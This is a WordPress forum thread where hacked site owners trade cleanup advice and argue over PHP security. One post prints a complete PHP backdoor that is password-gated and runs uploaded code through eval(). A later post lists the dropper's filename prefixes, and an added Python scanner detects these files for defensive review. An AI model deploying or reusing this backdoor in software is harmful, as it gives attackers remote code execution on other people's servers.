
got hacked (58 posts)

  1. Ivovic
    Member
    Posted 6 years ago #

    I feel parasites squirming around my intestines just thinking about it... I think that's a sign! ;)

    If I thought there was a legitimate credit card transaction among them, I'd seriously consider it.

    edit: if by chance you're not totally joking, I'm curious :)

  2. whooami
    Member
    Posted 6 years ago #

    hahahahhah

  3. Ivovic
    Member
    Posted 6 years ago #

    btw, I just realised you finally made it to a dogpile thread... nice going!

  4. elorgwhee
    Member
    Posted 6 years ago #

    I've been keeping up with the upgrades, and read through the security info that was posted and implemented everything that I could to keep things relatively secure. I'm more than just savvy and try to be conscious of possible security issues. I have a test environment at home where I test plugins, themes and upgrades, etc. Though I can't rule out that it wasn't my fault, nor the fact that I'm on a shared server. In moving to a new server, I'm installing everything clean and changing all passwords, etc. - but I'm not finished with the setup yet so I have to deal with this issue until I am.

    I would like to think that just because there's at least one person in this thread who was affected by this that doesn't seem to have much of a clue and is a bit obnoxious about asking for help, that you aren't assuming that everyone affected by this is a complete idiot.

  5. whooami
    Member
    Posted 6 years ago #

    elorgwhee,

    I would like to think that just because there's at least one person in this thread who was affected by this that doesn't seem to have much of a clue and is a bit obnoxious about asking for help, that you aren't assuming that everyone affected by this is a complete idiot.

    I don't assume anything of a kind, and don't mean to diminish the seriousness of any site being hacked. We spend quite a bit of time on these forums, so brevity helps. It is true though, about the unwashed masses though. :)

  6. clarkeian
    Member
    Posted 6 years ago #

    Ivovic wrote:

    "easy to build websites with hard to find vulnerabilities"

    I'm surprised the universe didn't implode when you said that. If it's easy to build... then surely it's easier to find the vulnerabilities than if it were HARD to build with it, right?

    Wrong, easy to build does not imply that it's easy to find vulnerabilities.

    PHP gives you lots of little shortcuts which make it easier to get the functionality you want, but often they also make it easier to do it in a way that allows malicious code-injection.

    What's your point anyway? You want something absolutely bug-free? Sorry it doesn't exist.

    Not bug-free, exploit free. There is plenty of software on my server that has never allowed my server to be compromised. PHP has allowed my server to be compromised at least twice!

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it's great. That's the same reason the hackers are after it.

    Hackers are after it due to the combination of its popularity, and its insecurity. There is plenty of popular and secure software out there.

    Trade ease of use, compatibility and extensibility for obscurity, then we'll see you on their forum complaining that they don't have as many nice features as wordpress.

    Useful features and security are not mutually exclusive, that is a lame cop-out. There are plenty of software platforms that are both featureful, popular, and secure. Perhaps if you spent more time away from PHP you'd see that.

  7. Joni
    Member
    Posted 6 years ago #

    There are plenty of software platforms that are both featureful, popular, and secure.

    Okay, I'll bite. Name a few. (And please understand: I'm NOT trying to be contentious here. I am actually quite curious to know your response.)

  8. Ivovic
    Member
    Posted 6 years ago #

    Whoo's on first...

    assuming that everyone affected by this is a complete idiot.

    Of course not... A lot of what I've posted here addresses concerns which are largely out of your control. There's no way you can possibly check every line of code for security issues yourself, so at some point you have to trust.

    I love plugin developers because they're the life of the wordpress community, but I advocate suspicion, because they're often just hacks like me trying to cobble a solution together. Regardless of that, no amount of suspicion or research will ever guarantee your safety.

    My first post in this thread addressed the issue as seriously as possible with the only course of action available to you right now, which is mopping up aisle 2... and hoping it's not your favourite plugin that has the issue.

    ... the rest of this thread relates to some senseless emotional whining from someone who definitely has *not* been responsible... and the ensuing coping mechanisms we have for that.

    Don't feel herded into a group you know you're not a part of. That distinction is obvious to anyone whose opinion counts for anything.

  9. clarkeian
    Member
    Posted 6 years ago #

    Okay, I'll bite. Name a few. (And please understand: I'm NOT trying to be contentious here. I am actually quite curious to know your response.)

    Exploits in Java code are rare, because Java frameworks tend to enforce good security practices (such as maintaining separation between data and code, and automatically escaping strings - something you have to do manually in PHP).

    Getting specific, one Java-based framework I have personal familiarity with is Apache Wicket - and I'm not aware of a single successful exploit of a Wicket-based website.

    Of course, you can write insecure code in any language, the difference is that in Java-based frameworks you really have to do something dumb, but in PHP the obvious way to do many things is insecure by default.

    When an exploit is found in most software packages, it is a genuinely rare thing that people react strongly to. It seems that when an exploit is found in WordPress, it just results in another "ho-hum" point release.

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects. It's depressing that expectations are so low around here :-(

  10. Ivovic
    Member
    Posted 6 years ago #

    Wrong, easy to build does not imply that it's easy to find vulnerabilities.

    Bzzzt... sorry, but that's a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

    It's completely logical that something simpler to understand is automatically simpler to keep track of.

    Useful features and security are not mutually exclusive

    You're arguing against my words, not against the spirit of what I was saying. That's a tired old forum tactic that I don't plan to indulge.

    Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That's true in all conceivable cases.

    Take your finest example, add another feature, and you've increased the likelihood that it will have a bug (and that the bug may be an exploit).

    Not bug-free, exploit free.

    In the conversational sense, exploits are just a kind of bug.

    There is plenty of software on my server that has never allowed my server to be compromised.

    That doesn't mean the exploits aren't there. I've never seen under your mattress, but that doesn't mean your sticky copy of equine weekly is a secret.

  11. Ivovic
    Member
    Posted 6 years ago #

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects

    This I agree with... but not because it's wordpress. This is an increasing phenomenon.

    I've found the prevailing attitude to be quite poor, and the official response from people like Matt that folks should just upgrade and stop whining is less than satisfactory.

    That doesn't change anything though... and it certainly doesn't explain your choice to keep using wordpress.

    Find yourself a java-based publishing platform and use it, maybe...

    I've used wordpress since the 1.5s and I've never had my wordpress hacked... so perhaps I'm not fed up yet. When I am fed up, you'll know it because I won't be here anymore.

  12. Joni
    Member
    Posted 6 years ago #

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

    Try substituting the word Microsoft or Windows for WordPress in the above statement and you'll find it's true there as well. :)

  13. Ivovic
    Member
    Posted 6 years ago #

    before we get stuck into windows and ms-bashing, let's take a moment to research the actual statistics for security vulnerabilities in linux vs windows (and firefox vs IE) over the last 8 years.

    I think it's high time we got over windows98 and started addressing the reality.

  14. whooami
    Member
    Posted 6 years ago #

    ..that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

    Spend some time using phpBB. Most developers of free open-source PHP projects have a similar response.

  15. clarkeian
    Member
    Posted 6 years ago #

    Ivovic wrote:

    Bzzzt... sorry, but that's a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

    Dude, you don't know what you are talking about. These ugly kludges may make it easier to write insecure code, but often there is an inverse relationship between ease of writing and ease of reading, just look at Perl. PHP is a horribly designed language, it encourages insecure coding practices, and they don't even bother to keep the API stable from release to release. In short, PHP is a mess of a programming language.

    You're arguing against my words, not against the spirit of what I was saying.

    Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

    That's a tired old forum tactic that I don't plan to indulge.

    A tired old forum tactic called "rational debate".

    Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That's true in all conceivable cases.

    That is only true if you assume that all code is equal, but it isn't. 10 lines of secure code is better than 1 line of insecure code.

    In the conversational sense, exploits are just a kind of bug.

    Yes, and...? If A is a kind of B, that doesn't mean that A is the same as B.

    That doesn't mean the exploits aren't there. I've never seen under your mattress, but that doesn't mean your sticky copy of equine weekly is a secret.

    Now you are just rambling incoherently. Of course there could be unknown exploits in non-PHP apps on my server, the point is that there are two known exploits in the PHP apps, in addition to all the unknown exploits there might be.

  16. elorgwhee
    Member
    Posted 6 years ago #

    Thanks whooami & Ivovic.

    Between work, I'm still trying to clean this up enough to make it through another week of finishing the testing/configuration on the new server. It traversed my directories and got literally hundreds of files (thousands maybe?). Scripting the cleanup would be a heck of a lot easier, but I'm not confident in my scripting abilities and friends are helping where they can (when they have time). Meanwhile, it's all manual.
    >_<

  17. Ivovic
    Member
    Posted 6 years ago #

    Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

    yes, actually I am, because that's what communication is. If I were to intentionally nit-pick everything you've written looking for double-meanings and unintended loopholes to exploit, we'd be here all day error-checking our writing instead of getting on with business.

    Come to think of it, it's now painfully obvious why you're being such an insufferable pain in the ass about all this. Unfortunately you're also being hypocritical because your language suffers the same lack of accuracy mine does (only you seem proud of it).

    case in point:

    Yes, and...? If A is a kind of B, that doesn't mean that A is the same as B.

    Actually, it means that B *is* the same as A, for the broader definition that A brings with it. Get it right.

    If you have a basket of apples, and one of them is red... they're all still apples. Even the red one.

    Please, nit-picking is for apes... I have no interest in it, so why not just go fix your busted wordpress as this discussion certainly isn't going to do it.

  18. Ivovic
    Member
    Posted 6 years ago #

    elorgwhee, consider taking your media off the server (that is, only the media files in your uploads directory structure), then just rm -rf the whole lot.

    ... you likely have a local copy of your theme already, and you'll have to reload plugins and such anyway...

    just a thought.

  19. elorgwhee
    Member
    Posted 6 years ago #

    Yeah, I've considered that. It's really tempting. But I have a bit of custom code that was affected as well - so there's no reinstalling it. I'd have to hope that my latest backup captured any of my recent updates to it.

    Maybe I'll just do that for wordpress and vanilla for now so at least those parts don't continue to crash people's computers. lol

    Or maybe I can just cut over to the new site without any templates or plugins. It won't be pretty, but it would work for now.. *rubs chin*

  20. Ivovic
    Member
    Posted 6 years ago #

    as one moon-face to another, I implore you to reconsider any prolonged chin-abrasion :)

    edit: I apologise, I just realised that it's only me who finds myself funny when I haven't had any sleep.... and with that, I'm out ;)

    good luck with the recovery.

  21. clarkeian
    Member
    Posted 6 years ago #

    Ivovic,

    I notice that you have now completely dropped the substantive argument about PHP's security, and are trying to change the subject to some meta-rhetorical waffle. This doesn't really surprise me, changing the subject is a common (if rather lame) way to avoid losing a debate.

    Even though I think your meta-rhetorical waffle is at least as specious as your opinions on programming language security, I came here to discuss the former, not the latter.

    Since you've dropped the subject I'm interested in, I think we are done.

  22. ClaytonJames
    Member
    Posted 6 years ago #

    I'll get the light...

    (click)

  23. martypants
    Member
    Posted 6 years ago #

    I got hacked, too. I just joined this site, and before I get flamed for being another guy who joined only when he got hacked, let me say it's because I've been a happy camper with WordPress for almost 2 years. It's done everything I asked and easily enough, so I just had no reason to search for more things to read. Sorry.

    Every one of my php and htm files got hacked with the script zikzak shows.
    How can I prevent it again?
    How can I fix my broken blogs? (can I just point to the still-good sql from a new installation and throw away the code in the old?) How would I do this?
    How do I punish the fuckers who did this? I want thumb screws and cat-o-nine-tails

    Thanks ever so much,
    Martin

  24. Flecko
    Member
    Posted 6 years ago #

    My site was hacked as well. Any chance this thread can re-evolve from bickering to helping everyone figure out the cause?

    I have the affected script attached to all my files...and although I didn't find anything tagged with pre_ in front of the filename, I did find that hello.php in my plugins directory was copied to ext_hello.php with some funky code in it.

    I have no idea how these guys got in, or how they destroyed my site. Any chance anyone has any ideas before I wipe it and start all over?

    Thanks everyone.

  25. Cugel
    Member
    Posted 6 years ago #

    I also got hacked and I had some custom code that wasn't backed-up recently, so I have to find the infected bits and clean it out.

    I have started comparing the hacked website with backup copies using a folder compare application. Then I compare any suspect files using an app for finding text differences. So far I have only found the code already posted here and a directory with 71 casino html-pages.

    In my case they used lib_ as a prefix on the files containing this:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','c1717aa0da396794f1a340b2ee7678c2');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

    Could someone please explain what this code is supposed to do?

  26. Cugel
    Member
    Posted 6 years ago #

    The code responsible for traversing directories and creating files containing the code mentioned above seems to reside in a file named wp-stats.php in the top level of the WordPress install. (If I am not mistaken – I am not a php-programmer)

    It randomly chooses a string to prepend to an existing filename. Prefixes used are 'lib_', 'co_', 'pre_', 'net_', 'func_', 'ad_', 'ext_', 'new_', 'old_', 'fix_', 'fixed_', 'na_', 'av_' and 'fx_'.

    There are some password related functions also.
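
Added example, not part of the original thread: a read-only Python scan for the dropped files described in the two posts above. It flags a file when it is a prefixed copy of a sibling (such as ext_hello.php beside hello.php) or contains at least two markers from the posted sample, which is a password-gated script that saves one uploaded file next to itself and passes another to eval(). The two-marker threshold, the function names and the sample tree are assumptions of this sketch, and it does not look for the script injected into existing files, which is not shown on this page.

```python
import os
import re
import tempfile

# Filename prefixes reported in the thread for the dropped copies.
PREFIXES = ("lib_", "co_", "pre_", "net_", "func_", "ad_", "ext_",
            "new_", "old_", "fix_", "fixed_", "na_", "av_", "fx_")
MARKERS = {  # byte patterns taken from the sample posted in the thread
    "md5_gate": re.compile(rb"md5\s*\(\s*\$_POST"),
    "upload_read": re.compile(rb"HTTP_POST_FILES"),
    "eval": re.compile(rb"\beval\s*\("),
}

def unprefixed(name):
    """Return name without a reported prefix, or None if it has none."""
    for prefix in PREFIXES:
        if name.startswith(prefix) and len(name) > len(prefix):
            return name[len(prefix):]
    return None

def scan(root):
    """Return sorted (relative_path, reasons) for files that need review."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".htm", ".html")):
                continue
            reasons = []
            base = unprefixed(name)
            if base in files:  # e.g. ext_hello.php beside hello.php
                reasons.append("prefixed copy of " + base)
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # droppers this small fit in 1 MiB
            except OSError:
                reasons.append("unreadable")
                data = b""
            hits = sorted(k for k, rx in MARKERS.items() if rx.search(data))
            if len(hits) >= 2:  # a single marker is common in clean PHP
                reasons.append("markers: " + ", ".join(hits))
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def demo():
    sample = {  # constructed files, not taken from any real site
        "index.php": b"<?php require 'wp-blog-header.php';",
        "plugins/hello.php": b"<?php /* Hello Dolly */",
        "plugins/ext_hello.php": b'<?php if (md5($_POST["p"]) == X) eval($c);',
        "theme/new_arrivals.php": b"<?php echo 'shop';",  # prefix, no sibling
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in sample.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return scan(root)
```

Run `scan()` against an offline copy of the site and review each hit by hand before deleting anything; `demo()` shows that a prefixed name with no matching sibling and no markers is not reported.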

  27. jbiethan
    Member
    Posted 6 years ago #

    Well we're all learning.
    We just put up a VPS server to control 1 issue of being hosted with other WP blogs that aren't keeping current and not using security measures.

    Now we're cleaning a few sites and need some help.

    We have a WordPress MYSQL database that appears to have
    had a SQL injection. We're attempting to clean the file and have
    a few questions.

    1) Are there any tools available that can scan a
    backup of a MySQL table exported from phpMyAdmin
    and clean out a SQL Injection?

    2) Are there any tools available that can scan an online MySQL
    database and clean out a SQL Injection?

    3) Are there any tools that can detect any other problems
    in regards to a WordPress installation that has been compromised?

    We're new to this cleanup process and any help at all in
    locating any tools would be greatly appreciated.

  28. Mobster
    Member
    Posted 6 years ago #

    Has anyone come up with a solution to this? I had this very thing happen to me recently. It seems there are a lot of threads like this that go unanswered.

    My files all began with fx_

    How should I check my database to make sure none of this is polluting that as well?

This topic has been closed to new replies.